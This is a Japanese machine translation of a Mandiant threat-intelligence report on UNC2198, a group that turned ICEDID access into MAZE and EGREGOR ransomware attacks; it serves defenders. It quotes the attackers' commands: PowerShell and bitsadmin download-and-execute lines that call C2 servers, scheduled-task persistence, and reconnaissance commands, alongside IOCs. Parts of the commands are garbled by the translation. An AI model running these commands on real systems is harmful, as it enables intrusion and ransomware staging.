So Unchill: UNC2198 ICEDID をランサムウェア操作に溶かす

Example UNC2420 MOUSEISLAND to ICEDID Infection Chain news

Mandiant Advanced Practices (AP) は、ランサムウェアで組織を深刻に混乱させる金銭目的のグループの変化する戦術、技術、および手順 (TTP) を綿密に追跡します。 2020 年 5 月、FireEye は、MAZE の展開に関連する侵入取引の詳細を説明するブログ投稿をリリースしました。この投稿の公開時点で、MAZE ランサムウェアを展開した 11 の異なるグループを追跡しています。 2020 年末に、ICEDID 感染からアクセスを取得した後、MAZE ランサムウェアを優先して EGREGOR ランサムウェアの展開を開始したこれらのグループのサブセットに変化が見られました。

2017 年にバンキング型トロイの木馬として発見されて以来、ICEDID は金銭目的の攻撃者が侵入操作を行うための悪質な侵入口へと進化しました。以前は、ICEDID は主に銀行の資格情報を対象として展開されていました。 2020 年には、攻撃者が影響を受けるネットワークへのアクセスを可能にするツールとして ICEDID をより明示的に使用していることが確認されました。多くの場合、これは一般的なエクスプロイト後のフレームワークの使用につながり、最終的にはランサムウェアの展開につながりました。このブログ投稿は、UNC2198 の最新のトレードクラフトに熱灯を当てています。 ICEDID 感染を使用して、MAZE または EGREGOR ランサムウェアを展開しました。

イグルーの構築: ICEDID 感染症

アクセスの取得などの個別の操作が連続した操作の一部ではない場合、侵入の個別のフェーズは、異なる未分類 (UNC) グループに起因します。純粋な「アクセス操作」は、ターゲット環境へのリモート アクセスを確立し、別のグループが実行する後続の操作を行います。別のグループの最初の足がかりを確立するために展開されるバックドアは、アクセス操作の一例です。

2020 年 7 月から 12 月にかけて、ICEDID フィッシング感染チェーンは、MOUSEISLAND と PHOTOLOADER を含む多段階のプロセスで構成されていました (図 1)。

Example UNC2420 MOUSEISLAND to ICEDID Infection Chain
図 1: UNC2420 MOUSEISLAND から ICEDID への感染チェーンの例

MOUSEISLAND は、感染の第 1 段階として使用される Microsoft Word マクロ ダウンローダーであり、フィッシング メールに添付されたパスワードで保護された zip 内に配信されます (図 2)。 ICEDID 関連のインシデントへの対応による侵入データに基づくと、MOUSEISLAND によって配信された 2 番目のペイロードは、ICEDID をインストールするための中間ダウンローダーとして機能する PHOTOLOADER です。 Mandiant は、PHOTOLOADER およびその他のペイロードのMOUSEISLAND配布を、Mandiant の Threat Pursuit チームによって作成された配布脅威クラスタである UNC2420 に起因すると考えています。 UNC2420 のアクティビティ シェアは、公表されている命名法である「 Shathak 」または「 TA551 」と重複しています。

UNC2420 MOUSEISLAND フィッシングメール
図 2: UNC2420 MOUSEISLAND フィッシング メール

氷、氷、BEACON…UNC2198

分析は常に進行中ですが、このブログ投稿の公開時点で、Mandiant はさまざまなサイズの複数の異なる脅威クラスター (UNC グループ) を追跡しており、ICEDID を足場として侵入操作を可能にしています。これらの脅威クラスターの中で最も顕著なのはUNC2198 です。このグループは、さまざまな業界にわたって北米の組織を標的にしています。少なくとも 5 つのケースで、UNC2198 は UNC2420 MOUSEISLAND から侵入操作を実行するための初期アクセスを取得しました。 2020 年、Mandiant は UNC2198 による 9 件の個別の侵入を特定しました。 UNC2198 の目的は、被害者のネットワークをランサムウェアで侵害することにより、侵入を収益化することです。 2020 年 7 月、Mandiant は、UNC2198 が ICEDID 感染によって提供されるネットワーク アクセスを利用して、MAZE ランサムウェアで環境を暗号化することを確認しました。 10 月から 11 月にかけて、UNC2198 が MAZE の展開から EGREGOR ランサムウェアの使用に移行したことを、別のインシデント対応業務で観察しました。 MAZE と同様に、EGREGOR はアフィリエイト モデルを使用して運営されており、EGREGOR を展開するアフィリエイトには、暗号化と恐喝の成功後に収益が提供されます。

UNC2198 クラスターは、6 か月以上にわたって拡張されました。 Mandiant の UNC に関する 2020 年 12 月のブログ投稿では、アクティビティのクラスターを統合して段階的に分類するために使用する分析的なトレード クラフトについて説明しました。 UNC の統合は、あるグループに起因する指標とトレード クラフトが別のグループに対して精査される実質的な分析手法です。同様の手口を共有していた 2 つの以前の UNC は、最終的に UNC2198 に統合されました。

帰属のスノーボール効果

AP は、2020 年 6 月に発生した ICEDID、BEACON、SYSTEMBC、および WINDARC を含む 1 回の侵入に基づいて UNC2198 を作成しました。 UNC2198 は、このインシデントの 26 時間で 32 のシステムを侵害しました。ただし、ランサムウェアは展開されませんでした。 2020 年 7 月を通して、MAZE ランサムウェアの展開につながった 1 件を含む、インシデント対応業務からの UNC2198 への 3 件の侵入が原因であることが判明しました。 2020 年 10 月、インシデント対応業務とマネージド ディフェンス クライアントの両方で多数の活動が行われた結果、2 つの新しい UNC グループが作成され、UNC2198 に起因する別のインシデントが発生しました。

2020 年 10 月に作成された新しい UNC グループの 1 つには、UNC2374 という指定が与えられました。 UNC2374 は、Managed Defense の顧客でのインシデント中に BEACON、WINDARC、および SYSTEMBC が観察された独自のクラスターとして始まりました。ツールの初期の類似性は、UNC2374 を UNC2198 とマージするほど強力なリンクを構成していませんでした。

UNC2374 の作成から 2 か月半後、UNC2374 を UNC2198 にマージするのに十分なデータ ポイントを収集しました。 UNC2374 を UNC2198 にマージする際に使用されるデータ ポイントには、次のものがあります。

  • UNC2198 および UNC2374 Cobalt Strike Team サーバーは、TCP ポート 25055 で次のサブジェクトを持つ自己署名証明書を使用しました。

C = 米国、ST = CA、L = カリフォルニア、O = Oracle Inc、OU = 仮想サービス、CN = oracle.com

  • UNC2198 および UNC2374 は、WINDARC マルウェアを同じファイル パス%APPDATA%teamviewers msi.dll に展開しました。
  • UNC2198 BEACON ローダーの署名に使用されたのと同じコード署名証明書が、2 つの UNC2374 SYSTEMBC トンネラー ペイロードの署名に使用されました。
  • UNC2374 および UNC2198 BEACON C2 サーバーは、侵入操作中の 10 分間の時間枠内で同じ被害者システムによってアクセスされました。

2020 年 10 月に作成された別の UNC グループには、UNC2414 という指定が与えられました。 3 つの別々の侵入は UNC2414 によるものであり、クラスターが拡大するにつれて、UNC2414 と UNC2198 の類似点が明らかになりました。 UNC2414 を UNC2198 にマージするために使用されるデータ ポイントのサブセットは次のとおりです。

  • UNC2198 および UNC2414 BEACON サーバーは、TCP ポート 25055 で次のサブジェクトを使用する自己署名証明書を使用しました。

C = 米国、ST = CA、L = カリフォルニア、O = Oracle Inc、OU = 仮想サービス、CN = oracle.com

  • UNC2198 および UNC2414 は BEACON をC:Windowsint32.dllとしてインストールしました
  • UNC2198 および UNC2414 は、RCLONE ユーティリティをC:Perflogsrclone.exeとしてインストールしました。
  • UNC2198 と UNC2414 は、最初のアクセスとして ICEDID を利用した金銭目的のアクターであることが証明されました。
    • UNC2198 は MAZE を展開しました
    • UNC2414 は EGREGOR を展開しました

UNC2198 と UNC2414 のマージは重要でした。UNC2198 が EGREGOR ランサムウェアにアクセスできることが明らかになったからです。 EGREGOR が使用されたタイミングは、Mandiant Intelligence が報告した MAZE ランサムウェアのシャットダウンとも一致しています。図 3 は、関連する侵入と UNC2198 へのマージのタイムラインを示しています。

UNC2198 タイムライン
図 3: UNC2198 タイムライン

UNC2198 侵入フロー: 初期アクセス後

複数回の侵入と他の UNC グループとのマージを通じて UNC2198 クラスターを拡張すると、採用されている TTP の範囲が浮き彫りになります。すべての UNC2198 侵入からいくつかの重要なデータを引き出して、攻撃者が使用する機能の融合を示しました。

足場を固める

アクセスを取得した後、UNC2198 はさまざまな手法を使用して追加のマルウェアを展開しました。たとえば、UNC2198 はInnoSetupドロッパーを使用して、ターゲット ホストに WINDARC バックドアをインストールしました。 UNC2198 はまた、BITS ジョブとリモート PowerShell ダウンロードを使用して、プロキシおよびトンネラー機能用の SYSTEMBC などの追加ツールをダウンロードしました。ダウンロードと実行のコマンド例は次のとおりです。

%COMSPEC% /C echo bitsadmin /transfer 257e http://<編集済み>/<編集済み>.exe %APPDATA%<編集済み>.exe & %APPDATA%<編集済み>.exe & del %APPDATA% <編集済み>.exe ^> %SYSTEMDRIVE%WINDOWSTempFmpaXUHFennWxPIM.txt > WINDOWSTempMwUgqKjEDjCMDGmC.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempMwUgqKjEDjCMDGmC.bat

%COMSPEC% /C echo powershell.exe -nop -w hidden -c (新しいオブジェクト System.Net.WebClient).Downloadfile(http://<編集済み>/<編集済み>.exe, <編集済み>.exe) ^ > %SYSTEMDRIVE%WINDOWSTempAVaNbBXzKyxktAZI.txt > WINDOWSTempyoKjaqTIzJhdDLjD.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempyoKjaqTIzJhdDLjD.bat

UNC2198 は、Cobalt Strike BEACON、Metasploit METERPRETER、KOADIC、および PowerShell EMPIRE を使用しました 攻撃的なセキュリティ ツール この段階でも。

攻撃的なセキュリティ ツール

UNC2198 は攻撃的なセキュリティ ツールを使用しており、同様に多くの攻撃者で見られます。 UNC2198 は、侵入の約 90% で BEACON を使用しています。 UNC2198 は、PowerShell スクリプトを使用するシェルコード ローダー、サービス実行可能ファイル、DLL など、さまざまな方法で Cobalt Strike BEACON をインストールして実行します。 BEACON を使用する方法と手段は本質的に固有のものではありませんが、UNC2198 TTP に光を当てる推定すべき側面がまだあります。

特定の BEACON 実行可能ファイルに焦点を当てると、ツール自体の使用を超えた別のストーリーが語られます。ジャンク コードと API 呼び出しは別として、UNC2198 BEACON および METERPRETER 実行可能ファイルは、多くの場合、マルウェア パッケージの固有の特徴を示します。これには、文字列内や子プロセスを介した実行時に表示される奇妙なコマンドライン引数が含まれます。

cmd.exe /c echo TjsfoRdwOe=9931 & reg add HKCUSOFTWAREWIlumYjNSyHob /v xFCbJrNfgBNqRy /t REG_DWORD /d 3045 & exit

cmd.exe /c echo ucQhymDRSRvq=1236 & reg add HKCUSOFTWAREYkUJvbgwtylk /v KYIaIoYxqwO /t REG_DWORD /d 9633 & exit

cmd.exe /c set XlOLqhCejHbSNW=8300 & reg add HKCUSOFTWAREWaMgGneKhtgTTy /v LbmWADsevLywrkP /t REG_DWORD /d 3809 & exit

これらのコマンド例は、ペイロードの実行を変更または変更しないため、機能しません。

別の手法では、検出を回避するために、Unicode エスケープ文字と ASCII 文字が混在するファイル パスを使用して BEACON をインストールします。

Unicode エスケープ

C:ProgramDataSu0443sHu0435u0430lsTu0430su0441host.exe

エスケープされていないユニコード

C:ProgramDataSуsHеаlsTаsсhost.exe

次に、 shadowdevという名前のスケジュールされたタスクを使用して、実行可能ファイルが実行されました。

cmd.exe /c schtasks /create /sc 分 /mo 1 /tn shadowdev /tr C:ProgramDataSu0443sHu0435u0430lsTu0430su0441host.exe

前の例はコンパイル済みの実行可能ファイルに関連していますが、UNC2198 は単純な PowerShell ダウンロード クレードルを使用して、Base64 でエンコードおよび圧縮された BEACON ステージャーをメモリ内で実行しています。

powershell -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘hxxp://5.149.253[.]199:80/auth’))

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(“hxxp://185.106.122[.]167:80/a”))

powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘hxxp://195.123.233[.]157:80/casino’))”

発見と偵察

UNC2198 は、発見および偵察活動中に多くの脅威グループで見られる共通の TTP を示しています。 UNC2198 は、BloodHound アクティブ ディレクトリ マッピング ユーティリティを使用しました C:ProgramData 」および「 C:Temp 」ディレクトリ内からの侵入中。

以下は、侵害された環境を列挙するために UNC2198 によって実行されるさまざまなコマンドの集合的な例です。

arp -a
whoami /グループ
whoami.exe /グループ /fo csv
whoami /全員

ネットユーザー
ネット グループ「ドメイン管理者」/ドメイン
ネットグループ「エンタープライズ管理者」/ドメイン
ネットグループ「ローカル管理者」/ドメイン
net localgroup “管理者” /ドメイン

nltest /domain_trusts
nltest / dclist :<編集済み>

ラテラル ムーブメントと権限昇格

UNC2198 は、Windows リモート管理と RDP を使用して、システム間を横方向に移動しています。 UNC2198 はまた、ターゲット システムで BEACON サービス バイナリのリモート実行を実行し、横方向に移動しました。 UNC2198 は、PowerShell を使用して SMB BEACON を起動し、次のようなコマンド ラインを実行します。

C:WINDOWSsystem32cmd.exe /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAB
BAEMAbwBUAHYAZQByAHQAXQA6ADOARgByAG8AbQBCAGEAcwBLADYANABTAHQAcgBpAG4AZwaAoACIASAA0AH
MASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwA3ADIALw…<切り捨てられた>

ある侵入の際、UNC2198 は SOURBITS 権限エスカレーション ユーティリティを使用して、標的のシステムでファイルを実行しました。 SOURBITS は、2020 年にWindows バックグラウンド インテリジェント転送サービス (BITS)で公開された脆弱性であるCVE-2020-0787のパッケージ化されたエクスプロイト ユーティリティです。 SOURBITS は、昇格された特権で任意のファイルを実行できるコマンドライン ユーティリティとして実装されているGitHub リポジトリから派生したコードで構成されています。 UNC2198 は、次のコンポーネントで SOURBITS を使用しました。

C:Users<ユーザー>DownloadsrunsysO.cr
C:Users<ユーザー>DownloadsstarterO.exe

ファイルrunsysO.crは、CVE-2020-0787 を悪用する XOR エンコードされた PE 実行可能ファイルであり、ターゲット システムのビット数に基づいて、2 つの埋め込まれた SOURBITS ペイロードのいずれかをドロップします。

データ盗難、ランサムウェアの展開、#TTR

他の金銭目的の脅威アクターと同様に、UNC2198 の手口の一部は、侵入の後期段階で、ランサムウェアがインストールされる前に被害組織の数百ギガバイトのデータを盗み出すことを含みます。具体的には、UNC2198 は、機密データの流出を支援するために、クラウド ストレージの同期に使用されるコマンド ライン ユーティリティである RCLONEを使用しています。観察されたデータ盗難のすべてのケースで、「 C:PerfLogsrclone.exe 」ファイル パスから RCLONE がUNC2198によって使用されました。

Time-to-Ransom 」 (TTR) は、最初に特定されたアクセス時間とランサムウェアの展開時間との差です。TTR は、攻撃者によるランサムウェアの展開の成功を食い止めるために、組織がどれだけ迅速に対応する必要があるかを示す有用な指標として機能します。組織のセキュリティ体制などの外的要因が測定に大きく影響する可能性があるため、TTR は完全な定量化ではありません。

この投稿では、UNC2198 の TTR を、ICEDID アクティビティからランサムウェアの展開までの間で測定しています。 2020 年 7 月、UNC2198 は PSEXEC を使用して MAZE ランサムウェアを展開し、TTR は 5.5 日でした。 2020 年 10 月、UNC2198 は強制的な GPO 更新を使用して EGREGOR ランサムウェアを展開し、TTR は 1.5 日でした。

楽しみにしている

大規模なマルウェア キャンペーンを通じて取得したアクセスを利用してランサムウェアを展開する脅威アクターは、増加傾向にあります。ランサムウェア グループの効率性は、防御側がランサムウェアの展開前に迅速に対応するために大きな負担となります。ランサムウェア グループは、侵害の成功を通じて運用上の専門知識を獲得し続けているため、運用を拡大しながら TTR を短縮し続けます。 UNC2198 のような特定の操作の基本となる TTP を理解することは、防御側の対応努力に有利になります。 UNC2198 などのグループに対する比類のない理解は、 Mandiant Advantageに反映されています。 Mandiant Advantage の保有情報にアクセスすることで、防御側は攻撃者が使用する TTP を認識し、組織のリスクを評価し、対策を講じることができます。グループの手口を迅速に評価するために行われた初期投資は、必然的に進化し、ツールセットのコンポーネントを交換するときに利益をもたらします。それが MAZE であろうと EGREGOR であろうと、冷たいものであろうと熱いものであろうと、Advanced Practices はこれらの冷酷な脅威アクターを追跡し続けます。

謝辞

このコンテンツのテクニカル レビューについて、Dan Perez、Andrew Thompson、Nick Richard、Cian Lynch、および Jeremy Kennelly に感謝します。さらに、私たちの調査を可能にする貴重な侵入データを収集してくださった Mandiant の最前線のレスポンダーに感謝します。

付録: マルウェア ファミリ

PHOTOLOADERは、ICEDID をダウンロードすることが確認されているダウンローダーです。偽の画像ファイルの HTTP リクエストを作成し、RC4 で復号化して最終的なペイロードを提供します。ホスト情報は、HTTP Cookie を介してコマンド アンド コントロール (C2) に送信されます。サンプルには、多数の悪意のないドメインを持つ実際の C2 を含む組み込みの C2 構成が含まれていることが確認されています。本物の C2 に加えて、悪意のないドメインにもアクセスします。

WINDARCは、TeamViewer の実行を乗っ取って C2 通信を行うバックドアです。プラグインをサポートし、いくつかのバックドア コマンドを受け入れます。コマンドには、TeamViewer ツールとの対話、リバース シェルの開始、新しいプラグインのロード、ファイルのダウンロードと実行、および構成設定の変更が含まれます。

SYSTEMBCはプロキシ マルウェアであり、C2 にビーコンを送信し、C2 が示すように、C2 とリモート ホスト間に新しいプロキシ接続を開きます。プロキシ通信は RC4 で暗号化されます。マルウェアは HTTP 経由でコマンドを受信し、指示に従って新しいプロキシ接続を作成します。アンダーグラウンドの販売広告では、このソフトウェアを「 socks5 バックコネクト システム」と呼んでいます。このマルウェアは通常、他のマルウェアに関連する悪意のあるトラフィックを隠すために使用されます。

付録: テクニックの検出

FireEye のセキュリティ ソリューションは、電子メール、エンドポイント、およびネットワーク レベルでこれらの脅威を検出します。以下は、このブログ投稿で概説されているアクティビティに関連する既存の検出のスナップショットです。

プラットホーム

検出名

FireEye ネットワーク セキュリティ

  • Downloader.Macro.MOUSEISLAND
  • Downloader.Win.PHOTOLOADER
  • Trojan.PHOTOLOADER
  • Downloader.IcedID
  • Trojan.IcedID
  • Malicious.SSL.IcedID
  • Malicious.SSL.IcedIdCert
  • Trojan.Malicious.Certificate
  • バックドア.BEACON
  • Trojan.Generic
  • Trojan.CobaltStrike

FireEye エンドポイント セキュリティ

リアルタイム (IOC)

  • ブラッドハウンドの攻撃経路マッピング (ユーティリティ)
  • ブラッドハウンド アタックパス マッピング A (ユーティリティ)
  • コバルトストライク (バックドア)
  • COBALT STRIKE DEFAULT DLL エクスポート (バックドア)
  • コバルト ストライク ネームド パイプ エコー (バックドア)
  • EGREGOR ランサムウェア(ファミリー)
  • ICEDID(ファミリー)
  • MAZEランサムウェア(ファミリー)
  • MAZEランサムウェアA(ファミリー)
  • Metasploit サービスの悪用 (ユーティリティ)
  • MOUSEISLAND (ダウンローダー)
  • MOUSEISLAND A (ダウンローダー)
  • MOUSEISLAND B (ダウンローダー)
  • PowerShell ダウンローダー (方法論)
  • POWERSHELL DOWNLOADER D (方法論)
  • プログラムデータからの SCHTASK 作成 (コレクション)
  • 疑わしいビット管理者の使用法 A (方法論)
  • 疑わしい PowerShell の使用法 (方法論)
  • WMIC SHADOWCOPY DELETE (方法論)

マルウェア防御 (AV/MG)

  • システムBC
  • Trojan.EmotetU.Gen.*
  • Trojan.Mint.Zamg.O
  • ジェネリック mg.*
  • ICEID
  • Gen:Variant.Razy.*
  • ジェネリック mg.*
  • ビーコン
  • Gen:Trojan.Heur.TP.TGW@bug909di
  • Gen:Variant.Bulz.1217
  • Trojan.GenericKD.34797730
  • ジェネリック mg.*

付録: 指標

95b78f4d3602aeea4f7a33c9f1b49a97

システムBC

0378897e4ec1d1ee4637cff110635141

システムBC

c803200ad4b9f91659e58f0617f0dafa

システムBC

ad4d445091a3b66af765a1d653fd1eb7

システムBC

9ecf25b1e9be0b20822fe25269fa5d02

システムBC

e319f5a8fe496c0c8247e27c3469b20d

システムBC

a8a7059278d82ce55949168fcd1ddde4

システムBC

aea530f8a0645419ce0abe1bf2dc1584

システムBC

3098fbc98e90d91805717d7a4f946c27

システムBC

45.141.84.212:4132

システムBC

45.141.84.223:4132

システムBC

79.141.166.158:4124

システムBC

149.28.201.253:4114

システムBC

193.34.167.34:80

ビーコン

195.123.240.219:80

ビーコン

23.227.193.167:80

ビーコン

5.149.253.199:80

ビーコン

e124cd26fcce258addc85d7f010655ea

ビーコン

7ae990c12bf5228b6d1b90d40ad0a79f

ビーコン

3eb552ede658ee77ee4631d35eac6b43

ビーコン

c188c6145202b65a941c41e7ff2c9afd

ビーコン

2f43055df845742d137a18b347f335a5

ビーコン

87dc37e0edb39c077c4d4d8f1451402c

ICEDID

1efababd1d6bd869f005f92799113f42

ICEDID

a64e7dd557e7eab3513c9a5f31003e68

ICEDID

9760913fb7948f2983831d71a533a650

ICEDID

14467102f8aa0a0d95d0f3c0ce5f0b59

ICEDID

コロンボスエードクラブ

ICEDID

colossueded.top

ICEDID

ゴールドディスコトップ

ICEDID

june85.cyou

ICEDID

付録: Mandiant のセキュリティ検証アクション

組織は、 Mandiant Security Validationを使用して、60 以上のアクションに対してセキュリティ コントロールを検証できます。

VID

名前

A101-509

フィッシングメール – 悪意のある添付ファイル、MOUSEISLAND、マクロベースのダウンローダー

A150-326

悪意のあるファイル転送 – MOUSEISLAND、ダウンロード、亜種 #1

A150-433

悪意のあるファイル転送 – MOUSEISLAND、ダウンロード、亜種 #2

A101-282

悪意のあるファイル転送 – MOUSEISLAND Downloader, ダウンロード

A104-632

Protected Theater – MOUSEISLAND ダウンローダー、実行

A101-266

コマンド アンド コントロール – MOUSEISLAND、PHOTOLOADER の HTTP GET リクエスト

A101-280

悪意のあるファイル転送 – PHOTOLOADER、ダウンロード

A101-263

コマンド アンド コントロール – PHOTOLOADER、DNS クエリ #1

A101-281

悪意のあるファイル転送 – ICEDID ステージ 3、ダウンロード

A101-279

悪意のあるファイル転送 – ICEDID 最終ペイロード、ダウンロード

A101-265

コマンド アンド コントロール – ICEDID、DNS クエリ #1

A101-264

コマンド アンド コントロール – ICEDID、DNS クエリ #2

A101-037

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #1

A101-038

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #2

A101-039

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #3

A101-040

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #4

A101-041

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #5

A101-042

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #6

A101-043

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #7

A101-044

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #8

A101-045

悪意のあるファイル転送 – MAZE、ダウンロード、亜種 #9

A100-878

コマンド アンド コントロール – MAZE ランサムウェア、C2 チェックイン

A101-030

コマンド アンド コントロール – MAZE ランサムウェア、C2 ビーコン、亜種 #1

A101-031

コマンド アンド コントロール – MAZE ランサムウェア、C2 ビーコン、亜種 #2

A101-032

コマンド アンド コントロール – MAZE ランサムウェア、C2 ビーコン、亜種 #3

A104-734

保護された劇場 – MAZE、PsExec の実行

A104-487

保護された劇場 – MAZE ランサムウェア、暗号化された PowerShell 実行

A104-485

保護された劇場 – MAZE ランサムウェアの実行、亜種 #1

A104-486

保護された劇場 – MAZE ランサムウェアの実行、亜種 #2

A104-491

ホスト CLI – MAZE、Target.lnk の作成

A104-494

ホスト CLI – MAZE、ランサムウェアを投下するメモ 書き込みディレクトリ

A104-495

ホスト CLI – MAZE、ディレクトリのトラバースとランサムウェアの投下に関するメモ、DECRYPT-FILES.html バリアント

A104-496

ホスト CLI – MAZE、ディレクトリのトラバースとランサムウェアのドロップ、DECRYPT-FILES.txt バリアント

A104-498

ホスト CLI – MAZE、デスクトップ壁紙ランサムウェア メッセージ

A150-668

悪意のあるファイル転送 – EGREGOR、ダウンロード

A101-460

コマンド アンド コントロール – EGREGOR、GET DLL ペイロード

A150-675

保護された劇場 – EGREGOR、実行、バリアント #1

A101-271

悪意のあるファイル転送 – BEACON、ダウンロード、亜種 #1

A150-610

悪意のあるファイル転送 – BEACON、ダウンロード

A150-609

コマンドアンドコントロール – ビーコン、チェックイン

A104-732

保護されたシアター – BEACON、Unicode エスケープ文字と ASCII 文字の混合実行

A101-514

悪意のあるファイル転送 – WINDARC、ダウンロード、亜種 #1

A100-072

悪意のあるファイル転送 – SYSTEMBC プロキシ、ダウンロード

A100-886

悪意のあるファイル転送 – Rclone.exe、ダウンロード

A100-880

悪意のあるファイル転送 – Bloodhound Ingestor C Sharp Executable Variant、ダウンロード

A100-881

悪意のあるファイル転送 – Bloodhound Ingestor C Sharp PowerShell バリアント、ダウンロード

A100-882

悪意のあるファイル転送 – Bloodhound Ingestor PowerShell バリアント、ダウンロード

A100-877

Active Directory – BloodHound、CollectionMethod すべて

A101-513

悪意のあるファイル転送 – SOURBITS、ダウンロード、亜種 #1

A104-733

Protected Theater – CVE-2020-0787、任意のファイル移動

A100-353

コマンド アンド コントロール – KOADIC エージェント (mshta)

A100-355

コマンド アンド コントロール – KOADIC を使用したマルチバンド通信

A104-088

ホスト CLI – PowerShell を使用したタイムスタンプ

A104-277

ホスト CLI – PowerShell による EICAR COM ファイルのダウンロード

A104-281

ホスト CLI – PowerShell による EICAR TXT ファイルのダウンロード

A104-664

ホスト CLI – EICAR、PowerShell でダウンロード

A150-054

悪意のあるファイル転送 – EMPIRE、ダウンロード

A100-327

コマンド アンド コントロール – PowerShell Empire エージェント (http)

A100-328

横移動、実行 – PsExec

A100-498

スキャン アクティビティ – Open RDP の TCP ポート スキャン

A100-502

スキャン アクティビティ – Open RDP の UDP ポート スキャン

A100-316

横移動 – PSSession と WinRM

A104-081

ホスト CLI – Mshta

付録: UNC2198 MITRE ATT&CK マッピング

ATT&CK戦術カテゴリ

テクニック

資源開発

インフラストラクチャの取得 (T1583)

  • 仮想専用サーバー (T1583.003)

開発能力 (T1587)

  • デジタル証明書 (T1587.003)

能力を獲得する (T1588)

  • コード署名証明書 (T1588.003)
  • デジタル証明書 (T1588.004)

初期アクセス

フィッシング (T1566)

  • スピアフィッシング添付ファイル (T1566.001)

外部リモート サービス (T1133)

有効なアカウント (T1078)

実行

コマンドおよびスクリプト インタープリター (T1059)

  • PowerShell (T1059.001)
  • Visual Basic (T1059.005)
  • Windows コマンド シェル (T1059.003)

スケジュールされたタスク/ジョブ (T1053)

  • スケジュールされたタスク (T1053.005)

システム サービス (T1569)

  • サービスの実行 (T1569.002)

ユーザー実行 (T1204)

  • 悪意のあるファイル (T1204.002)

Windows 管理インストルメンテーション (T1047)

持続性

外部リモート サービス (T1133)

スケジュールされたタスク/ジョブ (T1053)

  • スケジュールされたタスク (T1053.005)

有効なアカウント (T1078)

権限昇格

プロセス インジェクション (T1055)

スケジュールされたタスク/ジョブ (T1053)

  • スケジュールされたタスク (T1053.005)

有効なアカウント (T1078)

防御回避

防御力の低下 (T1562)

  • システム ファイアウォールの無効化または変更 (T1562.004)
  • ツールの無効化または変更 (T1562.001)

ホストでのインジケータの削除 (T1070)

  • タイムスタンプ (T1070.006)

コマンドの間接実行 (T1202)

レジストリの変更 (T1112)

難読化されたファイルまたは情報 (T1027)

  • ステガノグラフィ (T1027.003)

プロセス インジェクション (T1055)

署名付きバイナリ プロキシの実行 (T1218)

  • ムシュタ (T1218.005)

信頼コントロールを覆す (T1553)

  • コード署名 (T1553.002)

有効なアカウント (T1078)

仮想化/サンドボックスの回避 (T1497)

資格情報へのアクセス

OS 資格情報のダンプ (T1003)

発見

アカウントの検出 (T1087)

  • ローカル アカウント (T1087.001)

ドメイン信頼検出 (T1482)

ファイルとディレクトリの検出 (T1083)

アクセス許可グループの検出 (T1069)

システム情報検出 (T1082)

システム ネットワーク構成の検出 (T1016)

システム所有者/ユーザーの検出 (T1033)

仮想化/サンドボックスの回避 (T1497)

横移動

リモート サービス (T1021)

  • リモート デスクトップ プロトコル (T1021.001)
  • SMB/Windows 管理共有 (T1021.002)
  • SSH (T1021.004)

コレクション

収集データのアーカイブ (T1560)

  • ユーティリティによるアーカイブ (T1560.001)

コマンドと制御

アプリケーション層プロトコル (T1071)

  • Web プロトコル (T1071.001)

暗号化されたチャネル (T1573)

  • 非対称暗号 (T1573.002)

Ingress ツール転送 (T1105)

プロキシ (T1090)

  • マルチホップ プロキシ (T1090.003)

参照: https://www.mandiant.com/resources/blog/melting-unc2198-icedid-to-ransomware-operations

Comments

タイトルとURLをコピーしました